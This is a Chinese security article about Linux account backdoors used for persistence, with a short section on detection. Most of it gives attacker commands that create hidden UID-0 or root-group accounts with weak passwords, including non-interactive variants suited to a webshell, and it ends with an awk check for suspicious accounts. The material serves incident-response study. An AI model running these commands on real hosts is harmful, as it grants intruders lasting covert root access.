Linux系统账户后门及排查

admin 2022年9月26日16:14:11应急响应评论15 views1334字阅读4分26秒阅读模式

系统账户后门是一种最为简单有效的权限维持方式。攻击者在获取目标系统权限的前提下,通过创建一个系统账户作为持久化的据点,这样可以随时通过工具连接到目标系统,达到对目标主机进行长久控制的目的。根据获取的shell模式不同,创建系统账户的方式也不同,通常shell模式可以分为交互模式和非交互模式两种情况:

(1)当shell为交互模式时创建系统账户

当获取到目标系统的shell权限具有交互模式时,攻击者和目标系统可以进行数据交互,就可以根据系统反馈的提示信息创建系统账户和设置登录口令。如下我们可以使用usersdd和passwd指令创建test账户并对该账户设置登录口令。

useradd test  #添加test账户passwd test   #给test账户设置登录口令

也可以将test账户写入到/etc/passwd文件,然后通过passwd指令设置test系统账户的口令。

echo "test:x:0:0::/:/bin/sh" >>/etc/passwd   #添加test账户passwdtest                            #给test账户设置登录口令

(2)当shell为非交互模式时创建系统账户

当获取到目标系统的shell权限为非交互模式时,比如:webshell等,不能获取到系统的提示信息,也不能使用vim、vi等编辑工具时,就不能直接通过passwd指令设置登录口令了。此时,我们可以使用useradd创建test用户,使用` ` 符号是存放可执行的系统命令,设置该用户的登录口令。

useradd -p `openssl passwd -1 -salt 'salt' 123456` test

通过useradd指令创建一个test系统账户,然后通过“echo -e“指令设置test系统账户的口令。

useradd test;echo -e "123456n123456n" |passwd test

通过useradd指令创建一个test系统账户,"$()"也可以存放命令执行语句,设置该用户的登录口令。

useradd -p "$(openssl passwd -1 123456)" test

如下是在root组创建一个test用户,设置该test用户的登录口令为123456,-u 0表示设置该用户的uid为0,-g root -G root 将用户添加到root组,-s /bin/bash 指定新建用户的shell路径。

useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test

查询当前Linux系统隐藏的系统账户后门,可以通过查询/etc/passwd文件中的新增的潜藏用户,也可以通过awk指令查询uid=0和uid>=500的用户名,如图3-1-2 awk指令查询用户名。

awk -F : '($3>=500 || $3==0){print $1}' /etc/passwd

Linux系统账户后门及排查



- 往期推荐 -



Linux常见的持久化后门汇总


Linux系统账户后门及排查


原文始发于微信公众号(betasec):Linux系统账户后门及排查

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月26日16:14:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Linux系统账户后门及排查 http://cn-sec.com/archives/1316383.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: